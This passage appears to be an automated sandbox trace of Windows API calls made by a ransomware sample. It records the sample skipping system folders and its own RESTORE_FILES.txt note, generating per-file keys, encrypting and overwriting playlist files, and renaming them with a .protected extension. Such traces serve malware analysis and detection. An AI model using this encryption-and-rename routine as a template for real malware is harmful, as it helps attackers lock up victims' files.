(lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\0000E713\\07_TV_recorded_in_the_last_week.wpl" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\media player\\sync playlists\\en-us\\0000e713\\07_tv_recorded_in_the_last_week.wpl"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0084.965] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\0000E713\\07_TV_recorded_in_the_last_week.wpl") returned 136 [0084.965] StrStrW (lpFirst="07_TV_recorded_in_the_last_week.wpl", lpSrch=".txt") returned 0x0 [0084.965] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Media Player\\Sync 
Playlists\\en-US\\0000E713\\07_TV_recorded_in_the_last_week.wpl") returned 136 [0084.965] StrStrW (lpFirst="07_TV_recorded_in_the_last_week.wpl", lpSrch=".rar") returned 0x0 [0084.965] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\0000E713\\07_TV_recorded_in_the_last_week.wpl") returned 136 [0084.965] StrStrW (lpFirst="07_TV_recorded_in_the_last_week.wpl", lpSrch=".zip") returned 0x0 [0084.965] ReadFile (in: hFile=0x158, lpBuffer=0x4a2460, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0x4a2460*, lpNumberOfBytesRead=0x295e2d4*=0x410, lpOverlapped=0x0) returned 1 [0084.966] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xfffffbf0, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0084.966] WriteFile (in: hFile=0x158, lpBuffer=0x4a2460*, nNumberOfBytesToWrite=0x410, lpNumberOfBytesWritten=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0x4a2460*, lpNumberOfBytesWritten=0x295e2d4*=0x410, lpOverlapped=0x0) returned 1 [0084.966] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0084.967] WriteFile (in: hFile=0x158, lpBuffer=0x295e2ac*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0x295e2ac*, lpNumberOfBytesWritten=0x295e2d4*=0x4, lpOverlapped=0x0) returned 1 [0084.967] WriteFile (in: hFile=0x158, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295e2d4*=0x30, lpOverlapped=0x0) returned 1 [0084.967] CloseHandle (hObject=0x158) returned 1 [0084.967] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Media Player\\Sync 
Playlists\\en-US\\0000E713\\07_TV_recorded_in_the_last_week.wpl.protected") returned 146 [0084.967] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\0000E713\\07_TV_recorded_in_the_last_week.wpl" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\media player\\sync playlists\\en-us\\0000e713\\07_tv_recorded_in_the_last_week.wpl"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\0000E713\\07_TV_recorded_in_the_last_week.wpl.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\media player\\sync playlists\\en-us\\0000e713\\07_tv_recorded_in_the_last_week.wpl.protected")) returned 1 [0084.967] FindNextFileW (in: hFindFile=0x47bb10, lpFindFileData=0x295e2f0 | out: lpFindFileData=0x295e2f0) returned 1 [0084.967] lstrcmpiW (lpString1="08_Video_rated_at_4_or_5_stars.wpl", lpString2="Windows") returned -1 [0084.967] lstrcmpiW (lpString1="08_Video_rated_at_4_or_5_stars.wpl", lpString2="Program Files") returned -1 [0084.967] lstrcmpiW (lpString1="08_Video_rated_at_4_or_5_stars.wpl", lpString2="Program Files (x86)") returned -1 [0084.967] lstrcmpiW (lpString1="08_Video_rated_at_4_or_5_stars.wpl", lpString2="$Recycle.bin") returned 1 [0084.967] lstrcmpiW (lpString1="08_Video_rated_at_4_or_5_stars.wpl", lpString2="System Volume Information") returned -1 [0084.968] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\0000E713\\08_Video_rated_at_4_or_5_stars.wpl") returned 135 [0084.968] StrStrIW (lpFirst="08_Video_rated_at_4_or_5_stars.wpl", lpSrch=".protected") returned 0x0 [0084.968] lstrcmpW (lpString1="08_Video_rated_at_4_or_5_stars.wpl", lpString2="RESTORE_FILES.txt") returned -1 [0084.968] CryptGenRandom (in: hProv=0x444d38, 
dwLen=0x20, pbBuffer=0x295e28c | out: pbBuffer=0x295e28c) returned 1 [0084.968] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e2b4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e2b4*=0x30) returned 1 [0084.968] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\0000E713\\08_Video_rated_at_4_or_5_stars.wpl" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\media player\\sync playlists\\en-us\\0000e713\\08_video_rated_at_4_or_5_stars.wpl"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0084.969] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\0000E713\\08_Video_rated_at_4_or_5_stars.wpl") returned 135 [0084.969] StrStrW (lpFirst="08_Video_rated_at_4_or_5_stars.wpl", lpSrch=".txt") returned 0x0 [0084.969] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\0000E713\\08_Video_rated_at_4_or_5_stars.wpl") returned 135 [0084.969] StrStrW (lpFirst="08_Video_rated_at_4_or_5_stars.wpl", lpSrch=".rar") returned 0x0 [0084.969] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\0000E713\\08_Video_rated_at_4_or_5_stars.wpl") returned 135 [0084.969] StrStrW (lpFirst="08_Video_rated_at_4_or_5_stars.wpl", lpSrch=".zip") returned 0x0 [0084.969] ReadFile (in: hFile=0x158, lpBuffer=0x4a2460, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0x4a2460*, lpNumberOfBytesRead=0x295e2d4*=0x3fc, lpOverlapped=0x0) returned 1 [0084.977] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xfffffc04, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: 
lpNewFilePointer=0xffffffff) returned 1 [0084.977] WriteFile (in: hFile=0x158, lpBuffer=0x4a2460*, nNumberOfBytesToWrite=0x3fc, lpNumberOfBytesWritten=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0x4a2460*, lpNumberOfBytesWritten=0x295e2d4*=0x3fc, lpOverlapped=0x0) returned 1 [0084.977] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0084.977] WriteFile (in: hFile=0x158, lpBuffer=0x295e2ac*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0x295e2ac*, lpNumberOfBytesWritten=0x295e2d4*=0x4, lpOverlapped=0x0) returned 1 [0084.977] WriteFile (in: hFile=0x158, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295e2d4*=0x30, lpOverlapped=0x0) returned 1 [0084.977] CloseHandle (hObject=0x158) returned 1 [0084.977] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\0000E713\\08_Video_rated_at_4_or_5_stars.wpl.protected") returned 145 [0084.978] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\0000E713\\08_Video_rated_at_4_or_5_stars.wpl" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\media player\\sync playlists\\en-us\\0000e713\\08_video_rated_at_4_or_5_stars.wpl"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\0000E713\\08_Video_rated_at_4_or_5_stars.wpl.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\media player\\sync playlists\\en-us\\0000e713\\08_video_rated_at_4_or_5_stars.wpl.protected")) returned 1 [0084.979] FindNextFileW (in: hFindFile=0x47bb10, lpFindFileData=0x295e2f0 | out: 
lpFindFileData=0x295e2f0) returned 1 [0084.979] lstrcmpiW (lpString1="09_Music_played_the_most.wpl", lpString2="Windows") returned -1 [0084.979] lstrcmpiW (lpString1="09_Music_played_the_most.wpl", lpString2="Program Files") returned -1 [0084.979] lstrcmpiW (lpString1="09_Music_played_the_most.wpl", lpString2="Program Files (x86)") returned -1 [0084.979] lstrcmpiW (lpString1="09_Music_played_the_most.wpl", lpString2="$Recycle.bin") returned 1 [0084.979] lstrcmpiW (lpString1="09_Music_played_the_most.wpl", lpString2="System Volume Information") returned -1 [0084.979] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\0000E713\\09_Music_played_the_most.wpl") returned 129 [0084.979] StrStrIW (lpFirst="09_Music_played_the_most.wpl", lpSrch=".protected") returned 0x0 [0084.979] lstrcmpW (lpString1="09_Music_played_the_most.wpl", lpString2="RESTORE_FILES.txt") returned -1 [0084.979] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e28c | out: pbBuffer=0x295e28c) returned 1 [0084.979] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e2b4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e2b4*=0x30) returned 1 [0084.979] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\0000E713\\09_Music_played_the_most.wpl" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\media player\\sync playlists\\en-us\\0000e713\\09_music_played_the_most.wpl"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0084.980] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\0000E713\\09_Music_played_the_most.wpl") 
returned 129 [0084.980] StrStrW (lpFirst="09_Music_played_the_most.wpl", lpSrch=".txt") returned 0x0 [0084.980] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\0000E713\\09_Music_played_the_most.wpl") returned 129 [0084.980] StrStrW (lpFirst="09_Music_played_the_most.wpl", lpSrch=".rar") returned 0x0 [0084.980] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\0000E713\\09_Music_played_the_most.wpl") returned 129 [0084.980] StrStrW (lpFirst="09_Music_played_the_most.wpl", lpSrch=".zip") returned 0x0 [0084.980] ReadFile (in: hFile=0x158, lpBuffer=0x4a2460, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0x4a2460*, lpNumberOfBytesRead=0x295e2d4*=0x401, lpOverlapped=0x0) returned 1 [0084.987] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xfffffbff, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0084.987] WriteFile (in: hFile=0x158, lpBuffer=0x4a2460*, nNumberOfBytesToWrite=0x401, lpNumberOfBytesWritten=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0x4a2460*, lpNumberOfBytesWritten=0x295e2d4*=0x401, lpOverlapped=0x0) returned 1 [0084.987] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0084.987] WriteFile (in: hFile=0x158, lpBuffer=0x295e2ac*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0x295e2ac*, lpNumberOfBytesWritten=0x295e2d4*=0x4, lpOverlapped=0x0) returned 1 [0084.987] WriteFile (in: hFile=0x158, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295e2d4*=0x30, lpOverlapped=0x0) returned 1 [0084.987] CloseHandle (hObject=0x158) returned 1 [0084.987] wnsprintfW (in: pszDest=0x4dfbb0, 
cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\0000E713\\09_Music_played_the_most.wpl.protected") returned 139 [0084.987] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\0000E713\\09_Music_played_the_most.wpl" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\media player\\sync playlists\\en-us\\0000e713\\09_music_played_the_most.wpl"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\0000E713\\09_Music_played_the_most.wpl.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\media player\\sync playlists\\en-us\\0000e713\\09_music_played_the_most.wpl.protected")) returned 1 [0084.988] FindNextFileW (in: hFindFile=0x47bb10, lpFindFileData=0x295e2f0 | out: lpFindFileData=0x295e2f0) returned 1 [0084.988] lstrcmpiW (lpString1="10_All_Music.wpl", lpString2="Windows") returned -1 [0084.988] lstrcmpiW (lpString1="10_All_Music.wpl", lpString2="Program Files") returned -1 [0084.988] lstrcmpiW (lpString1="10_All_Music.wpl", lpString2="Program Files (x86)") returned -1 [0084.988] lstrcmpiW (lpString1="10_All_Music.wpl", lpString2="$Recycle.bin") returned 1 [0084.988] lstrcmpiW (lpString1="10_All_Music.wpl", lpString2="System Volume Information") returned -1 [0084.988] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\0000E713\\10_All_Music.wpl") returned 117 [0084.988] StrStrIW (lpFirst="10_All_Music.wpl", lpSrch=".protected") returned 0x0 [0084.988] lstrcmpW (lpString1="10_All_Music.wpl", lpString2="RESTORE_FILES.txt") returned -1 [0084.988] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e28c | out: pbBuffer=0x295e28c) 
returned 1 [0084.988] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e2b4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e2b4*=0x30) returned 1 [0084.988] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\0000E713\\10_All_Music.wpl" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\media player\\sync playlists\\en-us\\0000e713\\10_all_music.wpl"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0084.988] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\0000E713\\10_All_Music.wpl") returned 117 [0084.988] StrStrW (lpFirst="10_All_Music.wpl", lpSrch=".txt") returned 0x0 [0084.988] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\0000E713\\10_All_Music.wpl") returned 117 [0084.988] StrStrW (lpFirst="10_All_Music.wpl", lpSrch=".rar") returned 0x0 [0084.988] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\0000E713\\10_All_Music.wpl") returned 117 [0084.988] StrStrW (lpFirst="10_All_Music.wpl", lpSrch=".zip") returned 0x0 [0084.988] ReadFile (in: hFile=0x158, lpBuffer=0x4a2460, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0x4a2460*, lpNumberOfBytesRead=0x295e2d4*=0x427, lpOverlapped=0x0) returned 1 [0084.996] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xfffffbd9, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0084.996] WriteFile (in: hFile=0x158, lpBuffer=0x4a2460*, nNumberOfBytesToWrite=0x427, lpNumberOfBytesWritten=0x295e2d4, lpOverlapped=0x0 | out: 
lpBuffer=0x4a2460*, lpNumberOfBytesWritten=0x295e2d4*=0x427, lpOverlapped=0x0) returned 1 [0084.996] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0084.996] WriteFile (in: hFile=0x158, lpBuffer=0x295e2ac*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0x295e2ac*, lpNumberOfBytesWritten=0x295e2d4*=0x4, lpOverlapped=0x0) returned 1 [0084.996] WriteFile (in: hFile=0x158, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295e2d4*=0x30, lpOverlapped=0x0) returned 1 [0084.996] CloseHandle (hObject=0x158) returned 1 [0084.996] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\0000E713\\10_All_Music.wpl.protected") returned 127 [0084.996] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\0000E713\\10_All_Music.wpl" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\media player\\sync playlists\\en-us\\0000e713\\10_all_music.wpl"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\0000E713\\10_All_Music.wpl.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\media player\\sync playlists\\en-us\\0000e713\\10_all_music.wpl.protected")) returned 1 [0084.997] FindNextFileW (in: hFindFile=0x47bb10, lpFindFileData=0x295e2f0 | out: lpFindFileData=0x295e2f0) returned 1 [0084.997] lstrcmpiW (lpString1="11_All_Pictures.wpl", lpString2="Windows") returned -1 [0084.997] lstrcmpiW (lpString1="11_All_Pictures.wpl", lpString2="Program Files") returned -1 [0084.997] lstrcmpiW (lpString1="11_All_Pictures.wpl", 
lpString2="Program Files (x86)") returned -1 [0084.997] lstrcmpiW (lpString1="11_All_Pictures.wpl", lpString2="$Recycle.bin") returned 1 [0084.997] lstrcmpiW (lpString1="11_All_Pictures.wpl", lpString2="System Volume Information") returned -1 [0084.997] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\0000E713\\11_All_Pictures.wpl") returned 120 [0084.997] StrStrIW (lpFirst="11_All_Pictures.wpl", lpSrch=".protected") returned 0x0 [0084.997] lstrcmpW (lpString1="11_All_Pictures.wpl", lpString2="RESTORE_FILES.txt") returned -1 [0084.997] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e28c | out: pbBuffer=0x295e28c) returned 1 [0084.997] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e2b4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e2b4*=0x30) returned 1 [0084.997] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\0000E713\\11_All_Pictures.wpl" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\media player\\sync playlists\\en-us\\0000e713\\11_all_pictures.wpl"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0084.998] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\0000E713\\11_All_Pictures.wpl") returned 120 [0084.998] StrStrW (lpFirst="11_All_Pictures.wpl", lpSrch=".txt") returned 0x0 [0084.998] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\0000E713\\11_All_Pictures.wpl") returned 120 [0084.998] StrStrW (lpFirst="11_All_Pictures.wpl", lpSrch=".rar") returned 0x0 [0084.998] lstrlenW 
(lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\0000E713\\11_All_Pictures.wpl") returned 120 [0084.998] StrStrW (lpFirst="11_All_Pictures.wpl", lpSrch=".zip") returned 0x0 [0084.998] ReadFile (in: hFile=0x158, lpBuffer=0x4a2460, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0x4a2460*, lpNumberOfBytesRead=0x295e2d4*=0x249, lpOverlapped=0x0) returned 1 [0084.999] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xfffffdb7, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0084.999] WriteFile (in: hFile=0x158, lpBuffer=0x4a2460*, nNumberOfBytesToWrite=0x249, lpNumberOfBytesWritten=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0x4a2460*, lpNumberOfBytesWritten=0x295e2d4*=0x249, lpOverlapped=0x0) returned 1 [0084.999] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0084.999] WriteFile (in: hFile=0x158, lpBuffer=0x295e2ac*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0x295e2ac*, lpNumberOfBytesWritten=0x295e2d4*=0x4, lpOverlapped=0x0) returned 1 [0084.999] WriteFile (in: hFile=0x158, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295e2d4*=0x30, lpOverlapped=0x0) returned 1 [0084.999] CloseHandle (hObject=0x158) returned 1 [0085.000] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\0000E713\\11_All_Pictures.wpl.protected") returned 130 [0085.000] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\0000E713\\11_All_Pictures.wpl" (normalized: "c:\\users\\5p5nrgjn0js 
halpmcxz\\appdata\\local\\microsoft\\media player\\sync playlists\\en-us\\0000e713\\11_all_pictures.wpl"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\0000E713\\11_All_Pictures.wpl.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\media player\\sync playlists\\en-us\\0000e713\\11_all_pictures.wpl.protected")) returned 1 [0085.000] FindNextFileW (in: hFindFile=0x47bb10, lpFindFileData=0x295e2f0 | out: lpFindFileData=0x295e2f0) returned 1 [0085.000] lstrcmpiW (lpString1="12_All_Video.wpl", lpString2="Windows") returned -1 [0085.000] lstrcmpiW (lpString1="12_All_Video.wpl", lpString2="Program Files") returned -1 [0085.000] lstrcmpiW (lpString1="12_All_Video.wpl", lpString2="Program Files (x86)") returned -1 [0085.000] lstrcmpiW (lpString1="12_All_Video.wpl", lpString2="$Recycle.bin") returned 1 [0085.000] lstrcmpiW (lpString1="12_All_Video.wpl", lpString2="System Volume Information") returned -1 [0085.000] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\0000E713\\12_All_Video.wpl") returned 117 [0085.000] StrStrIW (lpFirst="12_All_Video.wpl", lpSrch=".protected") returned 0x0 [0085.000] lstrcmpW (lpString1="12_All_Video.wpl", lpString2="RESTORE_FILES.txt") returned -1 [0085.000] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e28c | out: pbBuffer=0x295e28c) returned 1 [0085.000] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e2b4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e2b4*=0x30) returned 1 [0085.000] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\0000E713\\12_All_Video.wpl" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\media 
